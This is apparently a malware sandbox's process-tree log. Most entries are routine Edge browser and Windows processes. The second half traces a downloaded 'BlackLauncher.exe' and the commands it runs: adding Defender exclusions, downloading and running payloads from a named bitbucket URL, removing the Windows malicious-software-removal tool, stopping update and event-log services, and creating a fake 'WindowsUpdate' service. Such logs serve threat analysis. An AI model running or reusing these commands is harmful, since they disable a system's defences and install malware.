  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
  2⤵
  PID:1564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4988 /prefetch:8
  2⤵
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4860 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
  2⤵
  PID:1260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3692 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4056
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
  2⤵
  PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
  2⤵
  PID:716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
  2⤵
  PID:3828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:3704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
  2⤵
  PID:1396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:1468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4888 /prefetch:8
  2⤵
  PID:340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
  2⤵
  PID:2752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
  2⤵
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6672 /prefetch:8
  2⤵
  PID:3024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3248
- C:\Users\Admin\Downloads\sbHBAhjbsa.exe
  "C:\Users\Admin\Downloads\sbHBAhjbsa.exe"
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  PID:236
- C:\Users\Admin\Downloads\sbHBAhjbsa.exe
  "C:\Users\Admin\Downloads\sbHBAhjbsa.exe"
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
  2⤵
  PID:1260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2128 /prefetch:1
  2⤵
  PID:1504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:2448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
  2⤵
  PID:1124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2956 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2128 /prefetch:1
  2⤵
  PID:1416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6064 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,8714953224648127280,13010223089799763648,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7372 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2624

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1184

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004EC
1⤵
PID:2968

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3572

C:\Users\Admin\Downloads\sbHBAhjbsa.exe
"C:\Users\Admin\Downloads\sbHBAhjbsa.exe"
1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:764

C:\Users\Admin\Downloads\sbHBAhjbsa.exe
"C:\Users\Admin\Downloads\sbHBAhjbsa.exe"
1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3396

C:\Users\Admin\Downloads\sbHBAhjbsa.exe
"C:\Users\Admin\Downloads\sbHBAhjbsa.exe"
1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1328

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3100

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4988

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3912

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\nb3ce1n9msom\" -ad -an -ai#7zMap26839:86:7zEvent30652
1⤵
PID:1828

C:\Users\Admin\Downloads\nb3ce1n9msom\BlackLauncher.exe
"C:\Users\Admin\Downloads\nb3ce1n9msom\BlackLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command " Start-Process -FilePath 'C:/Users/Admin/Downloads/nb3ce1n9msom/BlackLauncher.exe' -ArgumentList '--rendering-driver opengl3 --admin-requested' -Verb RunAs "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1172
- - C:\Users\Admin\Downloads\nb3ce1n9msom\BlackLauncher.exe
    "C:\Users\Admin\Downloads\nb3ce1n9msom\BlackLauncher.exe" --rendering-driver opengl3 --admin-requested
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2760
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/TDoZSSz.exe'""
      4⤵
      PID:3108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/TDoZSSz.exe'"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2872
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/7UkbkOq.exe'""
      4⤵
      PID:2248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/7UkbkOq.exe'"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4636
  - - C:\ProgramData\Update\TDoZSSz.exe
      C:\ProgramData\Update\TDoZSSz.exe
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:4948
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:280
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1936
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2096
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1320
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:684
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4064
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:2352
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:128
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WindowsUpdate"
        5⤵
        Launches sc.exe
        
        PID:2200
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:1892
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:868
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WindowsUpdate"
        5⤵
        Launches sc.exe
        
        PID:2984
  - - C:\ProgramData\Update\7UkbkOq.exe
      C:\ProgramData\Update\7UkbkOq.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:3108
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3976
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/W4hrCBo.exe'""
      4⤵
      PID:1848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/W4hrCBo.exe'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3056
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/OMhB4fX.exe'""
      4⤵
      PID:3288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/OMhB4fX.exe'"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4920
  - - C:\ProgramData\Update\W4hrCBo.exe
      C:\ProgramData\Update\W4hrCBo.exe
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      PID:2508
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4120
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3408
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:4576
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:3056
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:652
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4836
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:3308
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1404
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:3248
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WindowsUpdate"
        5⤵
        Launches sc.exe
        
        PID:1740
  - - C:\ProgramData\Update\OMhB4fX.exe
      C:\ProgramData\Update\OMhB4fX.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:4288
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4696

C:\ProgramData\Windows11\Updater.exe
C:\ProgramData\Windows11\Updater.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3704
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3732
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:684
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4440
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1320
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4892
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:580
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4308
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:448
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:4004

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\ShowOpen.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2912

C:\ProgramData\Windows11\Updater.exe
C:\ProgramData\Windows11\Updater.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2140
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4000
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1084
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2864
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1840
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4544
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:568
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd95aa3cb8,0x7ffd95aa3cc8,0x7ffd95aa3cd8
  2⤵
  PID:1292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
